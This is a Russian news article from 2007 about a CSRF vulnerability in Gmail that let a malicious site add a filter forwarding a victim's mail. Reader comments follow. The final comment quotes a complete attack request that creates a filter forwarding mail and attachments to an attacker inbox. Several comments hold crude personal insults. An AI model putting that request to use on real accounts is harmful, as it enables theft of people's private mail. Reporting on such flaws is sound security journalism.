В Gmail найдена серьезная уязвимость

image

Теги: Петков, Gmail

Петко Петков (Petko Petkov), участник хакерской организации GNU Citizen, рассказал миру о серьезной уязвимости в Gmail.

Петко Петков (Petko Petkov), участник хакерской организации GNU Citizen, рассказал миру о серьезной уязвимости в Gmail. Он даже опубликовал в блоге скриншоты того, как именно происходит взлом. Оказывается, на сайт можно внедрить специальный код - и все его посетители, авторизованные в Gmail, окажутся в опасности.

Подобный тип взлома называется "межсайтовая подмена запроса" (cross-site request forgery, CSRF). Сайт злоумышленников посылает на Gmail команду multipart/form-date POST (как назывет ее Петков) и с ее помощью настраивается копирование всех писем с атакованного почтового ящика на адрес хакеров. Причем, копируются как вновь приходящие письма, так и старые (если они хранятся в веб-ящике Gmail). Даже когда Google устранит уязвимость, фильтр будет пересылать сообщения до тех пор, пока остается в списке.

Петко Петков не рассказывает в подробностях о механизме работы "бага" Gmail и призывает всех остальных тоже не делать этого, чтобы компания Google успела устранить уязвимость. Сотрудники Google уже начали проверять факты, изложенные хакером.

Сотрудник российской компании "Яндекс" в частной беседе высказал уверенность в том, что приведенной Петковым информации вполне достаточно для воспроизведения атаки. "Это тривиальный CSRF. К сожалению, от него очень мало кто защищается", - говорит сотрудник "Яндекса".

На данный момент ходят слухи о том, что Google работает над новой версией Gmail. Причем, источник новости в данном случае оказался не совсем обычным. Google прибегает к помощи пользователей при переводе тех или иных элементов интерфейса своих программ, и среди других кусочков текста туда просочилось сообщение о том, что новая версия Gmail тестируется и в скором времени должна выйти в свет.

Уязвимости, подобные той, что обнаружил Петко Петков в Gmail, замечены и в других продуктах Google. Самой серьезной была "дыра" в Google Groups, позволяющая получить доступ к контактам и сообщениям Gmail. Вторая уязвимость была обнаружена в средствах поиска Google для вебмастеров, там можно было красть cookies пользователей. Третий "баг" был предназначен для доступа к чужим фотографиям через Google Picasa.

Все три уязвимости использовали т.н. "межсайтовый скриптинг" (cross site scripting, XSS), а для взлома Google Picasa была задействована также технология CSRF и некоторые ошибки в работе Flash и обработки URI. Уязвимость Google Groups уже закрыта, по остальным пунктам Google работает и, в том числе, готовит рекомендации для пользователей. В частности, там говорится о том, как опасно устанавливать в Picasa дополнительные кнопки неизвестного происхождения.


или введите имя

CAPTCHA
Страницы: 1  2  3  
1
28-09-2007 12:05:40
ууууу, больше наверное нечего сказать
0 |
ezo
28-09-2007 12:08:49
Это же уязвимости можно избежать, если не открывать ее линком, тоесть mouse3, а делать простой копи паст. Так же используя сборщиков почты можно обезопаситься.
0 |
28-09-2007 12:30:08
имхо надо равняться на гугл. десяток уязвимостей за год, при учете кол-ва сотрдуников (по всему миру порядка 7000) и гигантским проектам (которые разрабатывают маленькие группы)... уважуха
0 |
28-09-2007 12:37:55
Гугль - это империя зла
0 |
1
28-09-2007 12:30:55
ну фигли надо во-первых юзать почтовый клиент, а во-вторых, если уж приперло лазить на почту через веб-интерфейс, то делай это в отдельном браузере что касается этого петушка петьки, то его выступления ничто иное, как пиар, направленный на раскрутку своего имени. когда он станет достаточно известен, то какая-нить крупная контора возьмет его в свой штат официально каким-нить экспертом, а на самом деле - публичной куклой, которая кидается своим именем, подписывая им проприетарные статейки, как, например, принято в мелкософте.
0 |
1
28-09-2007 12:31:39
и еще кстати, дыра актуальна только для осла и в какой-то степени для ФФ
0 |
28-09-2007 13:17:08
что касается этого петушка петьки, то его выступления ничто иное, как пиар, направленный на раскрутку своего имени. когда он станет достаточно известен, то какая-нить крупная контора возьмет его в свой штат официально каким-нить экспертом,Ай- яй-яй, какого-то петушка возмут, потому что он пиарится, а тебя такого умного и красивого нет, обыдна да! Ой как обыдна. Чувак! А ты тоже давай пиарится начинай, может тебя тоже возьмут в мелкософт, а то что линух, там денег не плотять энтузиазистам, там только за спасибо.
0 |
1
28-09-2007 14:08:07
фанат, вы тяжело больны причем тут линукс? css от платформы не зависит. или вас мучает осознание того, что линуксовые админы больше получают и выше забираются по служебной лестнице? или вы мне мстите за то что я вас обосрал в другой ветке? там обтекайте там. фигли тут брызгаться ну, а если серьезно, то я просто против таких грязных методов самопиара.
0 |
28-09-2007 19:08:13
или вы мне мстите за то что я вас обосрал в другой ветке?. Судя по данной фразе можно сделать вывод, что это вы тяжело больны . Я конечно же читаю, кто что пишет, собираю крохи полезной информации для себя, среди мегатонн дерьма, которое Вы и Вам подобные выхлестываете сюда, но не на столько, что бы заморачиватся из-за того, что какой-то чел, с гипертрофированным самомнением сказал что-то обо мне плохо. Лечитесь, юноша.
0 |
1
29-09-2007 07:31:45
йцу, я б тебя тоже обосрал чессно слово. Жаль только, что реально фикалии не передаются по проводам, а то бы, прикинь, ты смотришь в монитор и в тебе лоб вылетает фика, достойная книги рекордов гиннеса и медленно стекает по твоему лицу на клаву. Вот круто будет да?
0 |
1
28-09-2007 13:42:08
Жесть! Только в болге нашел имитацию запроса на отправку атачей из почтового ящика http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20FilterПро все писма что то не увидел
0 |
Страницы: 1  2  3